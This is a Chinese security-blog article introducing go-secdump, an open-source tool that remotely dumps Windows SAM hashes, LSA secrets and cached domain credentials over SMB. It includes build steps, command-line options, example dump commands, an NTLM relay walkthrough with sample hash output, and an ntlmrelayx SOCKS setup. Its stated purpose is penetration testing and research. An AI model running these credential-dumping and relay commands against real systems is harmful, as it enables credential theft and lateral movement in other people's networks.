go-secdump:一款Windows注册表安全测试工具

2024-07-15 293 0

关于go-secdump

go-secdump是一款功能强大的Windows注册表安全检测工具,该工具基于Go语言开发,能够利用远程转储目标设备Windows注册表中的机密来检测其安全防护态势。

运行机制

该工具基于go-smb实现其功能,支持通过远程转储的形式从目标设备SAM注册表配置单元提取哈希值以及从SECURITY配置单元提取LSA敏感数据和缓存哈希值,整个过程无需任何远程代理,也无需接触磁盘。

该工具本质上是一个PoC,可以帮助广大研究人员了解和研究Windows注册表中SAM配置单元和SECURITY配置单元等内容的安全保护方式,以期更好地提升Windows设备的系统安全性。

工具下载

由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好最新版本的Go环境。

源码构建

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/jfjallid/go-secdump.git

然后切换到项目目录中,使用下列命令完成源码构建:

cd go-secdump

go build main.go

工具使用帮助

Usage: ./go-secdump [options]

 

options:

      --host <target>        远程服务器的主机名或IP地址

  -P, --port <port>          SMB端口 (默认为445)

  -d, --domain <domain>     用于登录的域用户名

  -u, --user <username>     用户名

  -p, --pass <pass>         密码

  -n, --no-pass             禁用密码提示,不发送凭据

      --hash <NT Hash>     用户密码的十六进制编码NT哈希

      --local                作为本地用户而不是域用户进行身份验证

      --dump                将SAM和SECURITY配置单元保存到磁盘

      --sam                 显式提取SAM配置单元中的机密

      --lsa                 显式提取LSA机密

      --dcc2                显式提取DCC2缓存

      --backup-dacl         在修改之前将原始DACL存储至磁盘

      --restore-dacl        使用磁盘备份恢复DACL

      --backup-file         DACL备份文件名 (默认为dacl.backup)

      --relay               启用SMB监听器,用于将NTLM身份验证中继到远程服务器,强制使用SMB 2.1,无加密

      --relay-port <port>    监听端口实现中继 (默认为445)

      --socks-host <target> 通过SOCKS5代理服务器建立连接

      --socks-port <port>   SOCKS5 proxy port (默认为1080)

  -t, --timeout               超时时长 (默认为5)

      --noenc               禁用SMB加密

      --smb2                强制使用SMB 2.1

      --debug               启用Debug模式

      --verbose             启用Verbose模式

  -o, --output              写入结果的文件名 (默认为stdout)

  -v, --version             显示工具版本信息

修改DACL

go-secdump将自动尝试修改然后恢复目标注册表项的DACL,但如果在恢复过程中出现问题(例如网络断开连接或其他中断),则远程注册表将保留修改后的 DACL。

使用--backup-dacl参数可以存储修改前的原始DACL的序列化副本。如果发生连接问题,可以使用--restore-dacl参数从文件中恢复DACL。

工具使用样例

转储所有的注册表机密

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local

or

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

仅转储SAM、LSA或DCC2缓存机密

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

NTLM中继

该工具还支持使用NTLM中继转储注册表机密,下列命令可开启监听器:

./go-secdump --host 192.168.0.100 -n --relay

想办法触发一个具备管理员访问权限的客户端去访问192.168.0.100,然后等待机密转储成功即可:

YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805

YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!

Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0

2023/12/13 14:47:28 [Notice] [+] Signing is NOT required

2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator

[*] Dumping local SAM hashes

Name: Administrator

RID: 500

NT: 2727D7906A776A77B34D0430EAACD2C5

 

Name: Guest

RID: 501

NT: <empty>

 

Name: DefaultAccount

RID: 503

NT: <empty>

 

Name: WDAGUtilityAccount

RID: 504

NT: <empty>

 

[*] Dumping LSA Secrets

[*] $MACHINE.ACC

$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4

$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...

[*] DPAPI_SYSTEM

dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100

dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939

[*] NL$KM

NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74

[*] Dumping cached domain credentials (domain/username:hash)

DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab

...

SOCKS代理

当使用 ntlmrelayx.py 作为上行代理时,提供的用户名必须与经过身份验证的客户端匹配,但密码可以为空:

./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server

...

 

./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080

许可证协议

本项目的开发与发布遵循MIT开源许可协议。

项目地址

go-secdump:【GitHub传送门

参考资料

https://github.com/jfjallid/go-smb

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

http://www.beginningtoseethelight.org/ntsecurity/index.htm

https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论